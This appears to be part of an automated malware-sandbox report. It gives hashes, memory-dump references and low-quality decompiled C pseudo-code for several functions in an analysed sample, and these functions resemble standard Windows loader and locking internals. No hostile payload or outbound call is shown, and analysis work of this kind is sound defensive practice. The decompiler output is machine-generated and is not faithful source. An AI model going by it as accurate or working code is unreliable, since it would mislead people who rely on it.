                                                    • Opcode ID: 21b7a4d951a6f02a8e4436c673306fa55206e52d8d85ae6ff9a03169d2c5da39
                                                    • Instruction ID: 5f69ee7925b7f5f305a089673483cba0e1027d2812cc405ade9ee6bc442cd5c7
                                                    • Opcode Fuzzy Hash: 21b7a4d951a6f02a8e4436c673306fa55206e52d8d85ae6ff9a03169d2c5da39
                                                    • Instruction Fuzzy Hash: 55712875E002299FDF06CFA8D884ADEBBB5FF48310F15802AE905EB291D735A905CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D86A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID:
                                                    • API String ID: 3446177414-0
                                                    • Opcode ID: b43034c571c5927309cb9dd00d362341ef8ee31d6049daff29517962dc319d2e
                                                    • Instruction ID: 13d77cbe2284241143ad7f88cda1cf6f654e77c39c7a23011b0b358229afaf1a
                                                    • Opcode Fuzzy Hash: b43034c571c5927309cb9dd00d362341ef8ee31d6049daff29517962dc319d2e
                                                    • Instruction Fuzzy Hash: 09516A34704616DFDB09CF1AC890A2AF7E2FB89721B10416DE90ADB710DB75EC41CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D80EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID:
                                                    • API String ID: 3446177414-0
                                                    • Opcode ID: e82d2e35cd5b4ae683ad4433e1f7453ef1cef6f405b233fd0b101a8e11f2808e
                                                    • Instruction ID: f894c0b619d0810a5cc98e57957bbfbb31be00967cf435aaa20047da41e656f8
                                                    • Opcode Fuzzy Hash: e82d2e35cd5b4ae683ad4433e1f7453ef1cef6f405b233fd0b101a8e11f2808e
                                                    • Instruction Fuzzy Hash: DF512372E0021D9FDF09CF98D844ADEBBB1FF48351F05812AE905AB290E735A901CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7C7A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 29%
                                                    			E1D7C7A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x1d86c840);
				E1D7E7BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x1d885a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x1d8891e0();
					E1D7CB490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x1d885d38; // 0x81d54f37
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x1d8865fc; // 0x86a6f454
					if(__eflags == 0) {
						_push(0);
						_push(4);
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E1D7D2B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E1D7E8AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x1d8865fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x1d8865fc; // 0x86a6f454
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E1D848890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x1d7650b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x1d8891e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x1d8891e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}











                                                    0x1d7c7a4f
                                                    0x1d7c7a4f
                                                    0x1d7c7a4f
                                                    0x1d7c7a51
                                                    0x1d7c7a56
                                                    0x1d7c7a5b
                                                    0x1d7c7a5d
                                                    0x1d7c7a61
                                                    0x1d7c7a67
                                                    0x1d7c7a6a
                                                    0x1d8047f8
                                                    0x1d804801
                                                    0x1d804806
                                                    0x1d80480d
                                                    0x1d804810
                                                    0x1d804813
                                                    0x1d804818
                                                    0x1d80481d
                                                    0x1d804823
                                                    0x1d804825
                                                    0x1d804826
                                                    0x1d80482b
                                                    0x1d80482c
                                                    0x1d80482e
                                                    0x1d804835
                                                    0x1d804838
                                                    0x1d80483b
                                                    0x1d804840
                                                    0x1d804840
                                                    0x1d804848
                                                    0x1d804848
                                                    0x1d80484d
                                                    0x1d804852
                                                    0x1d80485b
                                                    0x1d804863
                                                    0x1d804865
                                                    0x1d80486b
                                                    0x1d80486b
                                                    0x1d80486e
                                                    0x1d804871
                                                    0x1d804892
                                                    0x1d804895
                                                    0x1d804873
                                                    0x1d80487b
                                                    0x1d804881
                                                    0x1d804881
                                                    0x1d804898
                                                    0x1d80489e
                                                    0x1d7c7a70
                                                    0x1d7c7a72
                                                    0x1d7c7a7c
                                                    0x1d8048ac
                                                    0x1d8048b6
                                                    0x1d8048c2
                                                    0x1d8048c2

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                    • String ID:
                                                    • API String ID: 4281723722-0
                                                    • Opcode ID: 49eefb117f6da0d8b3e70dabaff3453cdb590502dfaf30fa548b76274083233d
                                                    • Instruction ID: b3d58067e62ccb1b0e39fc6766ddd31bf9e165c7748a0500567c2635fc6cacf2
                                                    • Opcode Fuzzy Hash: 49eefb117f6da0d8b3e70dabaff3453cdb590502dfaf30fa548b76274083233d
                                                    • Instruction Fuzzy Hash: BF310275E442689FCB06DFACD884A9DBBB0AB4C761F10456AE911A7290D7356900CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7958E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 58%
                                                    			E1D7958E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x1d86bd28);
				_push(E1D7DAD20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x1d88b370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E1D798120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E1D7980BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E1D798009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E1D7D8F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L1D7953C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E1D796055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E1D796074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E1D796179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E1D7CB490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E1D7A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E1D7963CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L1D7A2330(_t268, _t377 + 0x2c);
										E1D864407(_t377);
										E1D7A24D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E1D7964F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x1d886644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E1D7A5D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E1D7D46E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E1D7D8F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E1D796D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E1D796D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E1D796E00;
											if(_t342 == E1D796E00) {
												E1D796E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E1D7961C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E1D7D43A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L1D7A2330(_t288, _t377 + 0x2c);
														E1D864407(_t377);
														E1D7A24D0(_t377 + 0x2c);
													}
													_t292 = _t377 + 8;
													_v356 = _t292;
													_t379 =  *_t292;
													_t347 = _t292[1];
													_v320 = _t379;
													_v316 = _t347;
													while(1) {
														_t341 = _t379;
														_v360 = _t341;
														_t371 = _t347;
														_v364 = _t371;
														_t293 = _t341 & 0x0000ffff;
														_v308 = _t293;
														if( *((char*)(_t377 + 0xe4)) != 0) {
															goto L67;
														}
														if(_t371 != 0) {
															__eflags = _t293;
															if(_t293 < 0) {
																__eflags = _v261;
																if(_v261 == 0) {
																	goto L41;
																}
															}
															_v249 = 0;
															_v316 = _t371 - 1;
															L42:
															_t297 = _t341;
															_t341 = _t379;
															asm("lock cmpxchg8b [esi]");
															_t379 = _t297;
															_v320 = _t379;
															_t347 = _t371;
															_v316 = _t347;
															if(_t379 != _v360 || _t347 != _v364) {
																continue;
															} else {
																_t298 = _v249;
																_v245 = _t298;
																if(_t298 != 0) {
																	goto L8;
																}
																goto L20;
															}
														}
														L41:
														_v249 = 1;
														_t379 = (_v308 + 0x00000001 ^ _t341) & 0x0000ffff ^ _t341;
														_v320 = _t379;
														goto L42;
													}
												}
												goto L67;
											}
											__eflags = _t342 - E1D797290;
											if(_t342 != E1D797290) {
												__eflags = _t342 - E1D795570;
												if(_t342 != E1D795570) {
													 *0x1d8891e0();
													 *_t342();
													_v8 = 2;
													goto L34;
												}
												E1D795570( &_v216);
												goto L33;
											}
											E1D797290();
											goto L33;
										}
										L20:
										_push( &_v272);
										_t371 =  &_v244;
										_t347 = _t377;
										if(E1D796970(_t377,  &_v244) == 0) {
											goto L67;
										}
										if((_v84 & 0x00000001) != 0) {
											E1D78BE18( &_v216);
											_v84 = _v84 & 0xfffffffe;
										}
										_t359 = _v272;
										_v228 = _t359;
										_v168 =  *((intOrPtr*)( *_t359));
										_v164 = _t359;
										_v144 = _v220;
										_t360 =  *[fs:0x18];
										_v80 =  *((intOrPtr*)(_t360 + 0xf50));
										_v76 =  *((intOrPtr*)(_t360 + 0xf54));
										_v72 =  *((intOrPtr*)(_t360 + 0xf58));
										_v68 =  *((intOrPtr*)(_t360 + 0xf5c));
										_t309 = _v220;
										if(_t309 != 0 && ( *(_t309 + 0x10c) & 0x00000001) == 0) {
											_t372 = _v160 | 0x00000008;
											_v160 = _t372;
											_t316 =  *[fs:0x18];
											_v408 = _t316;
											if( *((intOrPtr*)(_t316 + 0xf9c)) != 0) {
												_t317 = 1;
											} else {
												_t317 = 0;
											}
											if(_t317 != 0) {
												_t372 = _t372 | 0x00000004;
												_v160 = _t372;
											}
											if(E1D796929() != 0) {
												_v160 = _t372;
											}
											if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xa0)) + 0xc)) ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
												_v160 = _v160 | 0x00000020;
											}
											_t322 =  *[fs:0x18];
											_v404 = _t322;
											if( *((intOrPtr*)(_t322 + 0xfb8)) != 0) {
												_v160 = _v160 | 0x00000040;
											}
											_t323 =  *[fs:0x18];
											_v380 = _t323;
											if( *((intOrPtr*)(_t323 + 0xf88)) != 0) {
												_v160 = _v160 | 0x00000080;
											}
										}
										_v8 = 8;
										_t361 = _v272;
										_t384 =  *((intOrPtr*)( *_t361));
										_push(_t361);
										_push( &_v216);
										if(_t384 != E1D796B70) {
											__eflags = _t384 - E1D7956E0;
											if(_t384 != E1D7956E0) {
												 *0x1d8891e0();
												 *_t384();
											} else {
												E1D7956E0(_t361);
											}
										} else {
											E1D796B70();
										}
										goto L33;
									}
								}
							}
							_t268 =  *0x7ffe03c0;
							goto L16;
						}
					}
					E1D797F98(_t341, _t377,  &_v244, _t377, _t379, _t394);
					_v252 = 1;
					_t379 = _v292;
					L1D7A2330(_t379 + 0x250, _t379 + 0x250);
					_v8 = 4;
					_t332 = _t379 + 0x254;
					_t368 =  *((intOrPtr*)(_t332 + 4));
					if( *_t368 != _t332) {
						asm("int 0x29");
						__eflags = _v292 + 0x250;
						return E1D7A24D0(_v292 + 0x250);
					}
					_v244 = _t332;
					_v240 = _t368;
					_t375 =  &_v244;
					 *_t368 = _t375;
					 *((intOrPtr*)(_t332 + 4)) = _t375;
					_v251 = 1;
					_v8 = 2;
					L71();
					E1D7D8F40( &_v216, 0, 0x98);
					_t389 = _t389 + 0xc;
					asm("lock inc dword [edi+0xf8]");
					_v250 = 1;
					_t371 =  &_v44;
					_t347 = _t377;
					E1D794A09(_t377,  &_v44, 0);
					goto L8;
				}
				_t339 =  *((intOrPtr*)(_t377 + 0x24));
				_v388 = _t339;
				_push(_t339);
				_t340 = E1D7D29A0();
				_v276 = _t340;
				if(_t340 < 0) {
					goto L73;
				}
				asm("lock inc dword [edi]");
				_v246 = 1;
				goto L5;
			}












































































































                                                    0x1d7958e0
                                                    0x1d7958e0
                                                    0x1d7958e0
                                                    0x1d7958e5
                                                    0x1d7958e7
                                                    0x1d7958ec
                                                    0x1d7958f7
                                                    0x1d7958f8
                                                    0x1d7958fe
                                                    0x1d795903
                                                    0x1d795906
                                                    0x1d795908
                                                    0x1d79590b
                                                    0x1d79590c
                                                    0x1d79590d
                                                    0x1d79590e
                                                    0x1d795912
                                                    0x1d795918
                                                    0x1d79591b
                                                    0x1d79591e
                                                    0x1d795928
                                                    0x1d79592e
                                                    0x1d795935
                                                    0x1d79593c
                                                    0x1d795943
                                                    0x1d79594a
                                                    0x1d795951
                                                    0x1d795958
                                                    0x1d79595f
                                                    0x1d795966
                                                    0x1d795970
                                                    0x1d79597a
                                                    0x1d795985
                                                    0x1d79598b
                                                    0x1d795998
                                                    0x1d79599d
                                                    0x1d7959a3
                                                    0x1d7959a8
                                                    0x1d7959b0
                                                    0x1d7959b2
                                                    0x1d7959b8
                                                    0x1d7959b8
                                                    0x1d7959c8
                                                    0x1d7959cd
                                                    0x1d7959d0
                                                    0x1d7959d7
                                                    0x1d7959e5
                                                    0x1d7959ea
                                                    0x1d7959f8
                                                    0x1d7f0745
                                                    0x1d7f074f
                                                    0x1d7f074f
                                                    0x1d7f0756
                                                    0x1d795a25
                                                    0x1d795a25
                                                    0x1d795a2c
                                                    0x1d795a31
                                                    0x1d795a38
                                                    0x1d795fef
                                                    0x1d795fef
                                                    0x1d795ff6
                                                    0x1d795ffb
                                                    0x1d796002
                                                    0x1d796007
                                                    0x1d796007
                                                    0x1d796009
                                                    0x1d79600f
                                                    0x1d796017
                                                    0x1d79601c
                                                    0x1d79601c
                                                    0x1d795b95
                                                    0x1d795b99
                                                    0x1d795f2d
                                                    0x1d795f32
                                                    0x1d795f36
                                                    0x1d795f36
                                                    0x1d795ba1
                                                    0x1d795fcf
                                                    0x1d795fcf
                                                    0x1d795fd4
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795fd6
                                                    0x1d795fd6
                                                    0x1d795fd9
                                                    0x1d7f07dc
                                                    0x1d7f07e3
                                                    0x1d7f07e5
                                                    0x1d7f07ea
                                                    0x00000000
                                                    0x1d7f07ea
                                                    0x1d795fdf
                                                    0x1d795fe2
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795fe8
                                                    0x00000000
                                                    0x1d795ba7
                                                    0x1d795ba9
                                                    0x1d795e71
                                                    0x1d795e77
                                                    0x1d795e79
                                                    0x1d795bb4
                                                    0x1d795bba
                                                    0x1d7f0836
                                                    0x1d7f083a
                                                    0x1d7f0841
                                                    0x1d7f0847
                                                    0x1d7f0847
                                                    0x1d795bd4
                                                    0x1d795bda
                                                    0x1d795be0
                                                    0x1d795be7
                                                    0x00000000
                                                    0x1d795bed
                                                    0x1d795bf3
                                                    0x1d795ae0
                                                    0x1d795ae0
                                                    0x1d795aec
                                                    0x1d795aef
                                                    0x1d795af2
                                                    0x1d795af5
                                                    0x1d795af8
                                                    0x1d795afb
                                                    0x1d795b07
                                                    0x1d795f69
                                                    0x1d795f73
                                                    0x1d795f8b
                                                    0x1d795f90
                                                    0x1d795f92
                                                    0x1d7f077f
                                                    0x1d7f077f
                                                    0x1d7f0789
                                                    0x1d795b43
                                                    0x1d795b43
                                                    0x1d795b49
                                                    0x1d795b53
                                                    0x1d795b5a
                                                    0x1d795b5d
                                                    0x1d795b66
                                                    0x1d795b67
                                                    0x1d795b6d
                                                    0x1d795b6e
                                                    0x1d795b74
                                                    0x1d795b7a
                                                    0x1d795b7b
                                                    0x1d795b80
                                                    0x1d795b86
                                                    0x1d795b8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795b8f
                                                    0x1d795f98
                                                    0x1d795f98
                                                    0x1d795f9e
                                                    0x1d795fa0
                                                    0x1d795fa7
                                                    0x1d795fae
                                                    0x1d795fb1
                                                    0x00000000
                                                    0x1d795fb1
                                                    0x1d795b13
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795b19
                                                    0x1d795b30
                                                    0x1d795b35
                                                    0x1d795b3b
                                                    0x1d795b41
                                                    0x00000000
                                                    0x1d795b41
                                                    0x1d795bf9
                                                    0x1d795bfe
                                                    0x1d795e84
                                                    0x1d795e8d
                                                    0x1d795e93
                                                    0x1d795ea1
                                                    0x1d795ea9
                                                    0x1d795eb4
                                                    0x1d795eb9
                                                    0x1d795ec0
                                                    0x1d795ec6
                                                    0x1d795ec7
                                                    0x1d795ed0
                                                    0x1d795ed1
                                                    0x1d795ed2
                                                    0x1d795ed8
                                                    0x1d795f15
                                                    0x1d795d52
                                                    0x1d795d52
                                                    0x1d795d59
                                                    0x1d795d60
                                                    0x1d7f0909
                                                    0x1d7f0909
                                                    0x1d795d6d
                                                    0x1d795d74
                                                    0x1d795d81
                                                    0x1d795d86
                                                    0x1d795d8d
                                                    0x1d795d9e
                                                    0x1d7f0955
                                                    0x1d7f0958
                                                    0x1d7f095e
                                                    0x1d7f0960
                                                    0x1d7f0963
                                                    0x1d7f0969
                                                    0x1d7f0969
                                                    0x1d7f096f
                                                    0x1d7f096f
                                                    0x1d7f096f
                                                    0x1d7f096f
                                                    0x1d7f0971
                                                    0x1d7f0977
                                                    0x1d7f0979
                                                    0x1d7f0989
                                                    0x1d7f0992
                                                    0x1d7f0998
                                                    0x1d7f099c
                                                    0x1d7f099e
                                                    0x1d7f09a4
                                                    0x1d7f09a6
                                                    0x1d7f09ac
                                                    0x1d7f09ac
                                                    0x1d7f09b4
                                                    0x1d7f09b4
                                                    0x1d7f09bc
                                                    0x1d7f09c6
                                                    0x1d7f09ce
                                                    0x1d7f09cf
                                                    0x1d7f09d1
                                                    0x1d7f09d4
                                                    0x1d795da4
                                                    0x1d795da4
                                                    0x1d795dac
                                                    0x1d795f0b
                                                    0x1d795f0b
                                                    0x1d795db8
                                                    0x1d7f09e2
                                                    0x1d7f09e9
                                                    0x1d7f09ef
                                                    0x1d7f09ef
                                                    0x1d795dbe
                                                    0x1d795dc1
                                                    0x1d795dc7
                                                    0x1d795dc9
                                                    0x1d795dcc
                                                    0x1d795dd2
                                                    0x1d795de0
                                                    0x1d795de0
                                                    0x1d795de2
                                                    0x1d795de8
                                                    0x1d795dea
                                                    0x1d795df0
                                                    0x1d795df3
                                                    0x1d795e00
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795e08
                                                    0x1d795eec
                                                    0x1d795eef
                                                    0x1d7f09f9
                                                    0x1d7f0a00
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f0a06
                                                    0x1d795ef7
                                                    0x1d795f00
                                                    0x1d795e29
                                                    0x1d795e29
                                                    0x1d795e2c
                                                    0x1d795e34
                                                    0x1d795e38
                                                    0x1d795e3a
                                                    0x1d795e40
                                                    0x1d795e42
                                                    0x1d795e4e
                                                    0x00000000
                                                    0x1d795e58
                                                    0x1d795e58
                                                    0x1d795e5e
                                                    0x1d795e66
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795e6c
                                                    0x1d795e4e
                                                    0x1d795e0e
                                                    0x1d795e0e
                                                    0x1d795e21
                                                    0x1d795e23
                                                    0x00000000
                                                    0x1d795e23
                                                    0x1d795de0
                                                    0x00000000
                                                    0x1d795d9e
                                                    0x1d795eda
                                                    0x1d795ee0
                                                    0x1d795f53
                                                    0x1d795f59
                                                    0x1d79602d
                                                    0x1d796033
                                                    0x1d796035
                                                    0x00000000
                                                    0x1d796035
                                                    0x1d795f5f
                                                    0x00000000
                                                    0x1d795f5f
                                                    0x1d795ee2
                                                    0x00000000
                                                    0x1d795ee2
                                                    0x1d795c04
                                                    0x1d795c0a
                                                    0x1d795c0b
                                                    0x1d795c11
                                                    0x1d795c1a
                                                    0x00000000
                                                    0x00000000
                                                    0x1d795c24
                                                    0x1d796047
                                                    0x1d79604c
                                                    0x1d79604c
                                                    0x1d795c2a
                                                    0x1d795c30
                                                    0x1d795c3a
                                                    0x1d795c40
                                                    0x1d795c4c
                                                    0x1d795c52
                                                    0x1d795c5f
                                                    0x1d795c68
                                                    0x1d795c71
                                                    0x1d795c7a
                                                    0x1d795c7d
                                                    0x1d795c85
                                                    0x1d795c9e
                                                    0x1d795ca1
